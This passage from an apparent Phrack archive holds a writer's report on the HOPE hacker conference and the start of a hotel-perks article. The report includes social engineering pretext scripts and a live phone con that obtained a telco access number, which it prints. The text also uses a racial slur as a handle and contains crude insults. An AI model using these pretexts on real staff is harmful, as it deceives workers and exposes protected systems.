  18316. MoD  gang.   The  implied threat was taken  seriously,  but,  for 
  18317. whatever  reason,  Corrupt  never showed.  It is  said  that  the 
  18318. majority of the hacking community distances itself from him; he's 
  18319. not  good  for  the collective reputation.  So  much  for  hacker 
  18320. fights.  All is calm.
  18321.  
  18322. The evening sessions continued and continued with estimates of as 
  18323. late  as 4AM being bandied about. Somewhere around 1:00AM  I  ran 
  18324. into  Bootleg  in the downstairs bar. Where was  everybody?   Not 
  18325. upstairs.   Not in the bar.  I saw a Garbage Heap in  the  street 
  18326. outside (now that's a double entendre) and then Goggans popped up 
  18327. from  the door of  the Blarney Stone, a syndicated chain of  low-
  18328. class Irish bars that serve fabulously thick hot sandwiches.  
  18329.  
  18330. "We're about to get thrown out."
  18331.  
  18332. "From  the  Blarney Stone?  That's impossible.  Drunks  call  the 
  18333. phone booths home!"
  18334.  
  18335. Fifty or so hacker/phreaks had migrated to the least likely, most 
  18336. anachronistic  location one could imagine.  A handful of  drunken 
  18337. sots leaning over their beers on a stain encrusted wooden  breed
  18338. ing  ground  for salmonella.  A men's room that hasn't  seen  the 
  18339. fuzzy end of a brush for the best part of a century made  Turkish 
  18340. toilets appear refreshingly clean.  And they serve food here.
  18341.  
  18342. I didn't look like a hacker so I asked the bartender, "Big crowd, 
  18343. eh?"
  18344.  
  18345. The  barrel  chested beer bellied  barman  nonchalantly  replied, 
  18346. "nah.  Pretty usual."  He cleaned a glass so thoroughly the water 
  18347. marks stood out plainly.
  18348.  
  18349. "Really?   This  much action on a Saturday night on a  dark  side 
  18350. street so questionably safe that Manhattan's Mugger Society posts 
  18351. warnings?"
  18352.  
  18353. "Yup."
  18354.  
  18355. "So," I continued.  "These hackers come here a lot?"
  18356.  
  18357. "Sure do," he said emphatically.
  18358.  
  18359. "Wow.  I didn't know that.  So this is sort of a hacker bar,  you 
  18360. might say?"
  18361.  
  18362. "Exactly.   Every Saturday night they come in and raise a  little 
  18363. hell."
  18364.  
  18365. With  a  straight face I somehow managed to  thank  the  confused 
  18366. barman  for  his help and for the next four  hours  learned  that 
  18367. socially, hackers of today are no different than many if not most 
  18368. of  us were in our late teens ad early twenties.  We laughed  and 
  18369. joked  and  so  do they - but there is more  computer  talk.   We 
  18370. decried the political status of our day as they do theirs, albeit 
  18371. they   with less fervor and more resignation.   The  X-Generation 
  18372. factor:  most  of them give little more than a  tiny  shit  about 
  18373. things  they view as being totally outside their control, so  why 
  18374. bother.  Live for today.  
  18375.  
  18376. Know they enemy.  Robert hung in with me intermingling and  argu
  18377. ing  and  debating  and learning from them,  and  they  from  us.  
  18378. Hackers aren't the enemy - their knowledge is - and they are  not 
  18379. the  exclusive holders of that information.  Information  Warfare 
  18380. is about capabilities, and no matter who possesses that capabili
  18381. ty, there ought to be a corresponding amount respect. 
  18382.  
  18383. Indeed,  rather than adversaries, hackers could well become  gov
  18384. ernment allies and national security assets in an intense  inter
  18385. national  cyber-conflict.   In the LoD/MoD War  of  1990-91,  one 
  18386. group of hackers did help authorities. Today many hackers  assist 
  18387. professional organizations, governments in the US and overseas  - 
  18388. although  very  quietly.   'Can't be  seen  consorting  with  the 
  18389. enemy.'    Is hacking from an Army or Navy or NATO base  illegal?  
  18390. Damned  if I know, but more than one Cyber Christ-like  character 
  18391. makes  a  tidy sum providing hands-on hacking  education  to  the 
  18392. brass in Europe.  
  18393.  
  18394. Where  these guys went after 5AM I don't know, but I was  one  of 
  18395. the first to be back at the HOPE conference later that day; 12:30 
  18396. PM Sunday.
  18397.  
  18398. * * * * * 
  18399.  
  18400. The Nazi Hunters were out in force.
  18401.  
  18402. "The Neo-Nazi skinheads are trying to start another Holocaust." A 
  18403. piercing, almost annoying voice stabbed right through the crowds.  
  18404. "Their racist propaganda advocates killing Jews and blacks.  They 
  18405. have to be stopped, now."
  18406.  
  18407. Mortechai Levy (I'll call him Morty) commanded the attention of a 
  18408. couple  dozen  hackers.  Morty was a  good,  emotional,  riveting 
  18409. shouter.  "These cowardly bastards have set up vicious hate  call 
  18410. lines  in  over 50 cities.  The messages advocate  burning  syna
  18411. gogues, killing minorities and other violence.  These phones have 
  18412. to be stopped!"
  18413.  
  18414. The ever-present leaflet from Morty's Jewish Defense Organization 
  18415. asked for help from the 2600 population.  
  18416.  
  18417.      "Phone  freaks  you must use your various  assorted  bag  of 
  18418.      tricks  to  shut these lines down. No  cowardly  sputterings 
  18419.      about 'free speech' for these fascist scum."  
  18420.  
  18421. The headline invited the hacker/phreak community to:
  18422.  
  18423.                "Let's Shut Down 'Dial-A-Nazi'!!!"
  18424.  
  18425. Morty was looking for political and technical support from a band 
  18426. of  nowhere  men and women who largely don't know  where  they're 
  18427. going  much  less care about an organized political  response  to 
  18428. someone  elses cause.  He wasn't making a lot of headway, and  he 
  18429. must  have  know that he would walk right  into  the  anarchist's 
  18430. bible: the 1st amendment.
  18431.  
  18432. The  battle  lines had been set.  Morty wanted to see  the  Nazis 
  18433. censored  and  hackers are absolute freedom of speechers  by  any 
  18434. measure.  Even Ben sauntering over for a group hug did little  to 
  18435. defuse the mounting tension.
  18436.  
  18437. I  couldn't help but play mediator. Morty was belligerently  loud 
  18438. and being deafeningly intrusive which affected the on-going  ses
  18439. sions.  To tone it down some, we nudged Morty and company off  to 
  18440. the  side  and occupied a corner of thread bare  carpet,  leaning 
  18441. against a boorish beige wall that had lost its better epidermis.  
  18442.  
  18443. The  heated  freedom  of speech versus the  promotion  of  racial 
  18444. genocide rancor subdued little even though we were all buns  side 
  18445. down.  I tried to get a little control of the situation.
  18446.  
  18447. "Morty. Answer me this so we know where you're coming from.   You 
  18448. advocate the silencing of the Nazis, right?
  18449.  
  18450. "They're planning a new race war; they have to be stopped."
  18451.  
  18452. "So  you  want  them silenced.  You say their  phones  should  be 
  18453. stopped and that the hackers should help."
  18454.  
  18455. "Call  that  number  and they'll tell you that  Jews  and  blacks 
  18456. should be killed and then they . . ."
  18457.  
  18458. "Morty.  OK, you want to censor the Nazis.  Yes or No."
  18459.  
  18460. "Yes."
  18461.  
  18462. "OK,  I can understand that.  The question really is, and I  need 
  18463. your help here, what is the line of censorship that you advocate.  
  18464. Where is your line of legal versus censored?"
  18465.  
  18466. A  few more minutes of political diatribe and then he got to  the 
  18467. point.  "Any group with a history of violence should be  censored 
  18468. and stopped."  A little imagination and suddenly the whole planet 
  18469. is silenced.  We need a better line, please.  "Hate group, Nazis, 
  18470. people   who   advocate   genocide  .  .   .   they   should   be 
  18471. silenced . . . ."
  18472.  
  18473. "So,"  I  analyzed.  "You want to establish  censorship  criteria 
  18474. based  upon  subjective interpretation.   Whose  interpretation?"  
  18475. My approach brought nods of approval.
  18476.  
  18477. One  has to admire Morty and his sheer audacity and tenacity  and 
  18478. how  much  he strenuously and single-mindedly drives  his  points 
  18479. home.   He  didn't have the ideal sympathetic  audience,  but  he 
  18480. wouldn't give an inch.  Not an inch.  A little self righteousness 
  18481. goes  a long way; boisterous extremism grows stale.   It  invites 
  18482. punitive  retorts  and  teasing, or  in  counter-culture  jargon, 
  18483. "fucking with their heads."
  18484.  
  18485. Morty  (perhaps for justifiable reasons) was  totally  inflexible 
  18486. and  thus  more prone to verbal barbing.  "You're just  a  Jewish 
  18487. racist.   Racism in reverse," accused one jocular but  definitely 
  18488. lower  middle  class hacker with an accent thicker  than  all  of 
  18489. Brooklyn.    
  18490.  
  18491. Incoming  Scuds!   Look  out! Morty went nuts and  as  they  say, 
  18492. freedom  of  speech ends when my fists impacts  upon  your  nose.  
  18493. Morty  came  dangerously  close to crossing  that  line.   Whoah, 
  18494. Morty,  whoah.  He's just fucking with your head.  The  calm-down 
  18495. brigade did its level best to keep these two mortals at  opposite 
  18496. ends of the room. 
  18497.  
  18498. "You  support  that  Neo Nazi down there; you're as  bad  as  the 
  18499. rest!"  Morty  said. "See what I have to tolerate.  I  know  him, 
  18500. we've been keeping track of him and he hangs out with the son  of 
  18501. the  Grand  Wizard of Nazi Oz."  The paranoid train  got  on  the 
  18502. tracks.  
  18503.  
  18504. "Do you really know the Big Poo-bah of Hate?" I asked the  hacker 
  18505. under assault and now under protective custody.
  18506.  
  18507. "Yeah," he said candidly.  "He's some dick head who hates  every
  18508. one.  Real jerk."
  18509.  
  18510. "So what about you said to Morty over there?"
  18511.  
  18512. "Just  fucking with his head.  He gets a little extreme."  So  we 
  18513. had  in our midst the Al Sharpton of the Jewish  faith.   Ballsy. 
  18514. Since Morty takes Saturday's off by religious law, he missed  the 
  18515. press  cavalcade,  but as a radical New York fixture,  the  media 
  18516. probably didn't mind too much.
  18517.  
  18518. I was off to sessions, Morty found new audiences as they came off 
  18519. the elevators, and the band played on.
  18520.  
  18521. * * * * *
  18522.  
  18523. In  my humble 40-something opinion, the best session of HOPE  was 
  18524. the  one  on social engineering.  
  18525.  
  18526. The  panel consisted of only Emmanuel, Supernigger (social  engi
  18527. neer par excellence) and Cheshire Catalyst.  The first bits  were 
  18528. pretty  staid dry conventional conference (ConCon) oriented,  but 
  18529. nonetheless, not the kind of info that you expect to find William 
  18530. H. Murray, Executive Consultant handing out.  
  18531.  
  18532. The  best social engineers make friends of their victims.  Remem
  18533. ber: you're playing a role.  Think Remington Steele.
  18534.  
  18535. Schmooze!  "Hey,  Jack did you get a load of the blond  on  Stern 
  18536. last night?"
  18537.  
  18538. Justifiable anger: "Your department has caused nothing but  head
  18539. aches.   These  damn new computers/phones/technology  just  don't 
  18540. work like the old ones.  Now either you help me now or I'm  going 
  18541. all the way to Shellhorn and we'll what he says about these kinds 
  18542. of screwups."  A contrite response is the desired effect. 
  18543.  
  18544. Butt  headed bosses: "Hey, my boss is all over my butt,  can  you 
  18545. help me out?"
  18546.  
  18547. Management  hatred:  "I'm sitting here at 3PM working while  man
  18548. agement is on their yachts.  Can you tell me . . .?"
  18549.  
  18550. Giveaways: "Did you know that so and so is having an affair  with 
  18551. so and so?  It's true, I swear.  By the way, can you tell me  how 
  18552. to . . ."
  18553.  
  18554. Empathy:  "I'm new, haven't been to the training course and  they 
  18555. expect me to figure this out all by myself.  It's not fair."
  18556.  
  18557. Thick Accent: "Hi.  Dees computes haf big no wurk. Eet no makedah 
  18558. passurt. Cunu help?  Ah, tanku." Good for a quick exchange and  a 
  18559. quick  good-bye.  Carefully done, people want you off  the  phone 
  18560. quickly.
  18561.  
  18562. Billsf,  the  almost 40 American phreak who now  calls  Amsterdam 
  18563. home  was  wiring  up Supernigger's real  live  demonstration  of 
  18564. social  engineering against Sprint. A dial tone came over the  PA 
  18565. system followed by the pulses to 411.
  18566.  
  18567. "Directory  Assistance," the operator's male voice  was  squeezed 
  18568. into a mere three kilohertz bandwidth.
  18569.  
  18570. Suddenly, to the immense pleasure of the audience, an  ear-split
  18571. ting screech a thousand times louder than finger nails on a chalk 
  18572. board not only belched across the sound system but caused instant 
  18573. bleeding  in  the ears of the innocent but now deaf  operator.  .  
  18574. Billsf   sheepishly  grinned.   "Just trying to wire  up  a  mute 
  18575. button."  
  18576.  
  18577. Three hundred people in unison responded: "It doesn't work."   No 
  18578. shit.
  18579.  
  18580. While  Billsf feverishly worked to regain his reputation,  Super
  18581. nigger  explained  what he was going to do. The  phone  companies 
  18582. have a service, ostensibly for internal use, called a C/NA.  Sort 
  18583. of a reverse directory when you have the number but want to  know 
  18584. who  the  number  belongs to and from whence it  comes.  You  can 
  18585. understand  that this is not the sort of feature that  the  phone 
  18586. company  wants to have in the hands of a generation of  kids  who 
  18587. are  so  apathetic that they don't even know they  don't  give  a 
  18588. shit.   Nonetheless, the access to this capability is through  an 
  18589. 800 number and a PIN.
  18590.  
  18591. Supernigger  was going to show us how to acquire such  privileged 
  18592. information.   Live.  "When you get some phone company person  as 
  18593. dumb  as a bolt on the other end, and you know a few buzz  words. 
  18594. you convince them that it is in their best interest and that they 
  18595. are supposed to give you the information."
  18596.  
  18597. "I've never  done this in front of an audience before, so give me 
  18598. three  tries," he explained to an anxiously foaming at the  mouth 
  18599. crowd.  No one took a cheap pot shot at him: tacit acceptance  of 
  18600. his rules.
  18601.  
  18602. Ring. Ring. 
  18603.  
  18604. "Operations.  Mary."
  18605.  
  18606. "Mary.  Hi, this is Don Brewer in social engineering over at CIS, 
  18607. how's it going?"  Defuse.
  18608.  
  18609. "Oh, fine. I guess."
  18610.  
  18611. "I know, I hate working Sundays.  Been busy?"
  18612.  
  18613. "Nah, no more.  Pretty calm.  How can I help you?"
  18614.  
  18615. "I'm  doing a verification and I got systems down.  I  just  need 
  18616. the C/NA.  You got it handy?"  Long pause.
  18617.  
  18618. "Sure,  lemme  look. Ah, it's 313.424.0900."  700  notebooks  ap
  18619. peared  out  of  nowhere, accompanied by the sound  of  700  pens 
  18620. writing down a now-public phone number.
  18621.  
  18622. "Got  it.  Thanks."  The audience is gasping  at  the  stunningly 
  18623. stupid  gullibility  of  Mary.  But quiet was  essential  to  the 
  18624. mission. 
  18625.  
  18626. "Here's  the PIN number while we're at it." Double  gasp.   She's 
  18627. offering the supposedly super secret and secure PIN number?   Was 
  18628. this event legal?  Had Supernigger gone over the line?
  18629.  
  18630. "No, CIS just came up.  Thanks anyway."
  18631.  
  18632. "Sure you don't need it?"
  18633.  
  18634. "Yeah.  Thanks.  Bye."  Click. No need to press the  issue.   PIN 
  18635. access  might  be worth a close look from the  next  computer  DA 
  18636. wanna-be.
  18637.  
  18638. An  instant  shock wave of cacophonous approval  worked  its  way 
  18639. throughout  the  750 seat ballroom in less than  2  microseconds.  
  18640. Supernigger  had  just  successfully set himself  as  a  publicly 
  18641. ordained  Cyber  Christ of Social Engineering.  His  white  robes 
  18642. were on the way.  Almost a standing ovation lasted for the better 
  18643. part  of a minute by everyone but the narcs in the  audience.   I 
  18644. don't know if they were telco or Feds of whatever, but I do  know 
  18645. that they were the stupidest narcs in the city of New York.  This 
  18646. pair of dour thirty something Republicans had sphincters so tight 
  18647. you could mine diamonds  out of their ass.  
  18648.  
  18649. Arms  defiantly and defensively crossed, they were stupid  enough 
  18650. to sit in the third row center aisle.  They never cracked a smile 
  18651. at some of the most entertaining performances I have seen outside 
  18652. of  the giant sucking sound that emanates from Ross Perot's ears.
  18653.  
  18654. Agree or disagree with hacking and phreaking, this was funny  and 
  18655. unrehearsed ad lib material.  Fools.  So, for fun, I crawled over 
  18656. the legs of the front row and sat in the aisle, a bare eight feet 
  18657. from the narcs.  Camera in hand I extended the 3000mm  tele-photo 
  18658. lens  which can distinguish the color of a  mosquitoes  underwear 
  18659. from a kilometer and pointed it in their exact direction.   Their 
  18660. childhood  acne scars appeared the depth of the Marianna  Trench.  
  18661. Click,  and the flash went off into their eyes, which at  such  a 
  18662. short  distance should have caused instant blindness.  But  noth
  18663. ing.  No reaction.  Nada. Cold as ice.  Rather disappointing, but 
  18664. now  we know that almost human looking narc-bots have  been  per
  18665. fected and are being beta tested at hacker cons. 
  18666.  
  18667. Emmanuel Goldstein is very funny.  Maybe that's why Ed Markey and 
  18668. he  get  along so well.  His low key voice rings  of  a  gentler, 
  18669. kinder  sarcasm but has a youthful charm despite that he  is  30-
  18670. something himself. 
  18671.  
  18672. "Sometimes  you  have to call back.  Sometimes you have  to  call 
  18673. over  and  over to get what you want.  You have to keep  in  mind 
  18674. that  the people at the other end of the phone are generally  not 
  18675. as  intelligent  as a powered down computer."   He  proceeded  to 
  18676. prove the point.
  18677.  
  18678. Ring ring,
  18679.  
  18680. "Directory Assistance."
  18681.  
  18682. "Hi."
  18683.  
  18684. "Hi."
  18685.  
  18686. "Hi."
  18687.  
  18688. "Can I help you."
  18689.  
  18690. "Yes."
  18691.  
  18692. Pause.
  18693.  
  18694. "Hello?"
  18695.  
  18696. "Hi."
  18697.  
  18698. "Hi."
  18699.  
  18700. "Can I help you.:
  18701.  
  18702. "OK."  
  18703.  
  18704. Shhhhh.  Ssshhh.  Quiet.  Shhhh.  Too damned funny for words.
  18705.  
  18706. "Directory Assistance."
  18707.  
  18708. "I need some information."
  18709.  
  18710. "How can I help you."
  18711.  
  18712. "Is this where I get numbers?"
  18713.  
  18714. "What number would you like?"
  18715.  
  18716. "Information."
  18717.  
  18718. "This is information."
  18719.  
  18720. "You said directory assistance."
  18721.  
  18722. "This is."
  18723.  
  18724. "But I need information."
  18725.  
  18726. "What information do you need?"
  18727.  
  18728. "For information."
  18729.  
  18730. "This is information."
  18731.  
  18732. "What's the number?"
  18733.  
  18734. "For what?"
  18735.  
  18736. "Information."
  18737.  
  18738. "This is directory assistance."
  18739.  
  18740. "I need the number for information."
  18741.  
  18742. Pause.  Pause.
  18743.  
  18744. "What number do you want?"
  18745.  
  18746. "For information."
  18747.  
  18748. Pause.  Guffaws, some stifled, some less so.  Funny stuff. 
  18749.  
  18750. "Hold on please."
  18751.  
  18752. Pause.
  18753.  
  18754. "Supervisor.  May I help you?"
  18755.  
  18756. "Hi."
  18757.  
  18758. "Hi."
  18759.  
  18760. Pause.
  18761.  
  18762. "Can I help you?"
  18763.  
  18764. "I need the number for information."
  18765.  
  18766. "This is directory assistance."
  18767.  
  18768. "Hi."
  18769.  
  18770. "Hi."
  18771.  
  18772. "What's the number for information?"
  18773.  
  18774. "This is information."
  18775.  
  18776. "What about directory assistance?"
  18777.  
  18778. "This is directory assistance."
  18779.  
  18780. "But I need information."
  18781.  
  18782. "This is information."
  18783.  
  18784. "Oh, OK. What's the number for information?"
  18785.  
  18786. Pause.
  18787.  
  18788. "Ah 411."
  18789.  
  18790. "That's it?"
  18791.  
  18792. "No. 555.1212 works too."
  18793.  
  18794. "So there's two numbers for information?"
  18795.  
  18796. "Yes."
  18797.  
  18798. "Which  one  is better?"   How this audience kept  its  cool  was 
  18799. beyond me.  Me and my compatriots were beside ourselves.
  18800.  
  18801. Pause.
  18802.  
  18803. "Neither."
  18804.  
  18805. "Then why are there two?"
  18806.  
  18807. Pause.
  18808.  
  18809. "I don't know."
  18810.  
  18811. "OK.  So I can use 411 or 555.1212."
  18812.  
  18813. "That's right."
  18814.  
  18815. "And which one should I use?"
  18816.  
  18817. Pause.
  18818.  
  18819. "411 is faster."  Huge guffaws.  Ssshhhh.  Ssshhhh..
  18820.  
  18821. "Oh. What about the ones?"
  18822.  
  18823. "Ones?"
  18824.  
  18825. "The ones."
  18826.  
  18827. "Which ones?"
  18828.  
  18829. "The ones at the front of the number."
  18830.  
  18831. "Oh, those ones.  You don't need ones.  Just 411 or 555.1212.."
  18832.  
  18833. "My friends say they get to use ones."  Big laugh.  Shhhhhh.
  18834.  
  18835. "That's only for long distance."
  18836.  
  18837. "To where?"  How does he keep a straight face?
  18838.  
  18839. Pause.
  18840.  
  18841. "If you wanted 914 information you'd use a one."
  18842.  
  18843. "If I wanted to go where?"
  18844.  
  18845. "To 914?"
  18846.  
  18847. "Where's that?"
  18848.  
  18849. "Westchester."
  18850.  
  18851. "Oh, Westchester.  I have friends there."
  18852.  
  18853. Pause.
  18854.  
  18855. "Hello?"
  18856.  
  18857. "Yes?"
  18858.  
  18859. "So I use ones?"
  18860.  
  18861. "Yes.  A one for the 914 area."
  18862.  
  18863. "How?"
  18864.  
  18865. Pause.
  18866.  
  18867. "Put a one before the number."
  18868.  
  18869. "Like 1914. Right?"
  18870.  
  18871. "1914.555.1212."
  18872.  
  18873. "All of those numbers?"
  18874.  
  18875. "Yes."
  18876.  
  18877. "That's three ones."
  18878.  
  18879. "That's the area code."
  18880.  
  18881. "I've  heard about those.  They confuse me."   Rumbling  chuckles 
  18882. and laughs throughout the hall. 
  18883.  
  18884. Pause.
  18885.  
  18886. She  slowly and carefully explained what an area code is  to  the 
  18887. howlingly irreverent amusement of the entire crowd except for the 
  18888. fool narcs. 
  18889.  
  18890. "Thanks.  So I can call information and get a number?"
  18891.  
  18892. "That's right."
  18893.  
  18894. "And there's two numbers I can use?"
  18895.  
  18896. "Yes."
  18897.  
  18898. "So I got two numbers on one call?"
  18899.  
  18900. "Yeah . . ."
  18901.  
  18902. "Wow.  Thanks.  Have a nice day."
  18903.  
  18904. * * * * * 
  18905.  
  18906. Comments heard around HOPE.
  18907.  
  18908. Rop Gongrijjp, Hacktic:  "The local phone companies use their own 
  18909. social  engineers  when they can't get their own people  to  tell 
  18910. them what they need to know."
  18911.  
  18912. Sprint  is  using what they consider to be  the  greatest  access 
  18913. mechanism since the guillotine.  For all of us road warriors  out 
  18914. there  who are forever needing long distance voice  service  from 
  18915. the Whattownisthis, USA airport, Sprint thinks they have a better 
  18916. mousetrap.  No more messing finger entry.  No more pass-codes  or 
  18917. PIN's.  
  18918.  
  18919. I  remember at the Washington National Airport last summer I  was 
  18920. using my Cable and Wireless long distance access card and entered 
  18921. the PIN and to my surprise, an automated voice came on and  said, 
  18922. "Sorry,  you entered your PIN with the wrong finger.  Please  try 
  18923. again."
  18924.  
  18925. Sprint says they've solved this thorny cumbersome problem with  a 
  18926. service  called  "The Voice Fone Card".   Instead  of  memorizing 
  18927. another  64 digit long PIN, you just speak into the phone:   "Hi, 
  18928. it's me.  Give me dial tone or give me death."  The voice  recog
  18929. nition  circuits  masturbate  for a while to  determine  if  it's 
  18930. really you or not.   
  18931.  
  18932. Good idea.  But according to Strat, not a good execution.   Strat 
  18933. found  that someone performing a poor imitation of his voice  was 
  18934. enough  to break through the front door with ease.  Even  a  poor 
  18935. tape  recording  played back over a cheap  cassette  speaker  was 
  18936. sufficient to get through Sprint's new whiz-banger ID system.  
  18937.  
  18938. Strat  laughed that Sprint officials said in defense, "We  didn't 
  18939. say it was secure: just convenient."  
  18940.  
  18941. Smart.  Oh, so smart.
  18942.  
  18943. * * * * * 
  18944.  
  18945. "If  my  generation of the late 60's and early 70's had  had  the 
  18946. same  technology  you guys have there never would  have  been  an 
  18947. 80's."  This was how I opened my portion of the author's panel.
  18948.  
  18949. The authors panel was meant to give HOPE hackers insight into how 
  18950. they  are  perceived  from the so-called outside.   I  think  the 
  18951. session  achieved that well, and I understand the videos will  be 
  18952. available soon.  
  18953.  
  18954. The question of electronic transvestites on AOL came up to every
  18955. one's enjoyment, and all of us on the panel retorted with a  big, 
  18956. "So  what?"  If you have cyber-sex with someone on the  'Net  and 
  18957. enjoy  it,  what the hell's the difference?   Uncomfortable  butt 
  18958. shifting  on chairs echoed how the largely male  audience  likely 
  18959. feels about male-male sex regardless of distance. 
  18960.  
  18961. "Imagine,"  I  kinda said, "that is a few years you have  a  body 
  18962. suit  which  not only can duplicate your moves exactly,  but  can 
  18963. touch you in surprisingly private ways when your suit is connect
  18964. ed  to another.  In this VR world, you select the gorgeous  woman 
  18965. of choice to virtually occupy the other suit, and then the two of 
  18966. you  go  for it.  How do you react when you  discover  that  like 
  18967. Lola, 'I know what I am, and what I am is a man and so's  Lola.'"   
  18968. Muted  acknowledgment  that  unisex may come  to  mean  something 
  18969. entirely different in the not too distant future.
  18970.  
  18971. "Ooh, ooh, please call on me."  I don't mean to be insulting, but 
  18972. purely  for identification purposes, the woman behind  the  voice 
  18973. bordered  on five foot four and four hundred pounds. Her  bathtub 
  18974. had stretch marks.
  18975.  
  18976. I never called on her but that didn't stop her.
  18977.  
  18978. "I want to know what you think of how the democratization of  the 
  18979. internet  is affected by the differences between  the  government 
  18980. and  the  people who think that freedom of the net  is  the  most 
  18981. important thing and that government is fucked but for freedom  to 
  18982. be  free  you have to have the democracy behind you  which  means 
  18983. that the people and the government need to, I mean, you know, and 
  18984. get  along  but the sub culture of the hackers doesn't  help  the 
  18985. government but hackers are doing their thing which means that the 
  18986. democracy will not work , now I know that people are laughing and 
  18987. giggling  (which they were in waves) but I'm serious  about  this 
  18988. and I know that I have a bad case of hypomania but the medication 
  18989. is working so it's not a bad as it could be.  What do you think?"
  18990.  
  18991. I  leaned forward into the microphone and gave the only  possible 
  18992. answer.   "I  dunno.  Next."  The thunderous  round  of  applause 
  18993. which  followed my in-depth response certainly suggested that  my 
  18994. answer was correct.  Not politically, not technically, but  anar
  18995. chistically. Flexibility counts.
  18996.  
  18997. * * * * * 
  18998.  
  18999. HOPE  was attended by around one thousands folks, and  the  Hotel 
  19000. Filthadelphia still stands.  (Aw shucks.)  
  19001.  
  19002. My single biggest complaint was not that the schedules slipped by 
  19003. an  hour or two or three; sessions at conferences like this  keep 
  19004. going  if  the  audience is into them and they are  found  to  be 
  19005. educational and productive.  So an hour session can run into  two 
  19006. if  the  material and presentations fit the mood.   In  theory  a 
  19007. boring session could find itself kama kazi'd into early melt-down 
  19008. if  you have the monotone bean counter from hell  explaining  the 
  19009. distributed  statistical means of aggregate synthetic  transverse 
  19010. digitization   in  composite  analogous  integral   fruminations.  
  19011. (Yeah, this audience would buy off on that in a hot minute.)  But 
  19012. there were not any bad sessions.  The single track plenary  style 
  19013. attracted  hundred  of  hackers for every  event.   Emmanuel  and 
  19014. friends picked their panels and speakers well.  When dealing with 
  19015. sponge-like minds who want to soak up all they can learn, even in 
  19016. somewhat of a party atmosphere, the response is bound to be good.  
  19017.  
  19018. My single biggest complaint was the registration nightmare.   I'd 
  19019. rather go the DMV and stand in line there than get tagged by  the 
  19020. seemingly  infinite lines at HOPE.  At DefCon early  registration 
  19021. was encouraged and the sign up verification kept simple.
  19022.  
  19023. For some reason I cannot thoroughly (or even partially) fathom, a 
  19024. two  step  procedure was chosen.  Upon entering, and  before  the 
  19025. door narcs would let anyone in, each attendee  had to be assigned 
  19026. a piece of red cardboard with a number on it.  For the first  day 
  19027. you could enter the 'exhibits' and auditorium without  challenge.  
  19028. But by Day 2 one was expected to wait in line for the better part 
  19029. of  a week, have a digital picture taken on a computer tied to  a 
  19030. CCD  camera,  and then receive a legitimate HOPE  photo-ID  card.  
  19031. What  a  mess. I don't have to beat them up on it too  bad;  they 
  19032. know the whole scheme was rotten to the core.  
  19033.  
  19034. I waited till near  the end of Day 2 when the lines were gone and 
  19035. the  show was over.  That's when I got my Photo ID card.  I  used 
  19036. the MIB's photo ID card the rest of the time.
  19037.  
  19038. HOPE  was a lot of fun and I was sorry to see it end, but as  all 
  19039. experiences, there is a certain amount of letdown.  After a great 
  19040. vacation, or summer camp, or a cruise, or maybe even after  Wood
  19041. stock, a tear welts up.  Now I didn't cry that HOPE was over, but 
  19042. an  intense 48 hours with hackers is definitely not your  average 
  19043. computer  security convention that only rolls from 9AM  to  Happy 
  19044. Hour.   At a hacker conference, you snooze, you lose.  You  never 
  19045. know  what is going to happen next - so much is  spontaneous  and 
  19046. unplanned  - and it generally is highly educational,  informative 
  19047. and entertaining.
  19048.  
  19049. Computer  security folks:  you missed an event  worth  attending.  
  19050. You  missed some very funny entertainment.  You missed some  fine 
  19051. young people dressed in some fine garb.  You missed the chance to 
  19052. meet with your perceived 'enemy'.  You missed the opportunity  to 
  19053. get  inside  the heads of the generation that  knows  more  about 
  19054. keyboards  than  Huck  Finning in suburbia.   You  really  missed 
  19055. something,  and  you should join Robert MIB Steele and I  at  the 
  19056. next hacker conference.              
  19057.  
  19058. * * * * *
  19059.  
  19060. If only I had known.
  19061.   
  19062. If  only I had known that tornadoes had been dancing up and  down 
  19063. 5th  avenue  I would have stayed at the Hotel  Filthadelphia  for 
  19064. another night.  
  19065.  
  19066. La  Guardia airport was closed.  Flights were up to 6  hours  de
  19067. layed if not out and out canceled.  Thousands of stranded travel
  19068. ers hunkered down for the night.  If only I had known.  
  19069.  
  19070. Wait, wait. Hours to wait.  And then, finally, a plane ready  and 
  19071. willing to take off and swerve and dive between thunderbolts  and 
  19072. twisters and set me on my way home.  
  19073.  
  19074. My kids were bouncing out of the car windows when my wife  picked 
  19075. me up at the airport somewhere in the vicinity of 1AM.  
  19076.  
  19077. "Not  too  late are you dear?"  Sweet Southern  Sarcasm  from  my 
  19078. Sweet Southern Wife.  
  19079.  
  19080. "Don't  blame me," I said in all seriousness.  "It was the  hack
  19081. ers.  They caused the whole thing."
  19082.  
  19083. * * * * * 
  19084.  
  19085. Notice: This article is free, and the author encourages responsi
  19086. ble  widespread electronic distribution of the document in  full, 
  19087. not  piecemeal.  No fees may be charged for its use.    For  hard 
  19088. copy print rights, please contact the author and I'll make you an 
  19089. offer  you can't refuse.  The author retains full  copyrights  to 
  19090. the contents and the term Cyber-Christ.
  19091.  
  19092. Winn is the author of "Terminal Compromise",  a  novel  detailing 
  19093. a  fictionalized account of a computer war waged on   the  United 
  19094. States.   After selling well as a book-store-book, Terminal  Com
  19095. promise  was placed on the Global Network as the  world's   first 
  19096. Novel-on-the-Net Shareware and has become an underground classic.  
  19097. (Gopher TERMCOMP.ZIP)  
  19098.  
  19099. His  new  non-fiction book, "Information Warfare:  Chaos  on  the 
  19100. Electronic  Superhighway" is  a compelling, non-technical  analy
  19101. sis   of personal privacy, economic and industrial espionage  and 
  19102. national  security.   He calls for the creation  of   a  National 
  19103. Information Policy,  a  Constitution  in Cyberspace and an  Elec
  19104. tronic Bill of Rights.
  19105.  
  19106. He   may  be reached at INTER.PACT,  11511  Pine  St.,  Seminole, 
  19107. FL.  34642. 813-393-6600, fax 813-393-6361,  E-Mail:
  19108. P00506@psilink.com.
  19109.  
  19110.                               ==Phrack Magazine==
  19111.  
  19112.                  Volume Five, Issue Forty-Six, File 24 of 28
  19113.  
  19114. ****************************************************************************
  19115.  
  19116.  
  19117. The ABCs of better  H O T E L   Staying ...
  19118.  
  19119.                                        ...  by SevenUp (sec@escape.com)
  19120.  
  19121. This ARTICLE will give you some information on how to experience
  19122. a cheaper, safer, and more comfortable stay at your next hotel visit.
  19123. Always keep in mind that the staff is taught to make your stay
  19124. as pleasant as possible and fulfil most of your wishes. So it is often
  19125. a matter of social engineering to reach your goal.
  19126.  
  19127. BUSINESS CENTRES
  19128. Many good hotels offer business centres. Some business centres just offer
  19129. "typing service" at high rates, others provide a PC you can use for free.
  19130. Usually it is a 286 or older, but it should give you the opportunity
  19131. to copy warez, write your latest article for Phrack or even connect your
  19132. pocket modem and login to the -> Internet.
  19133.  
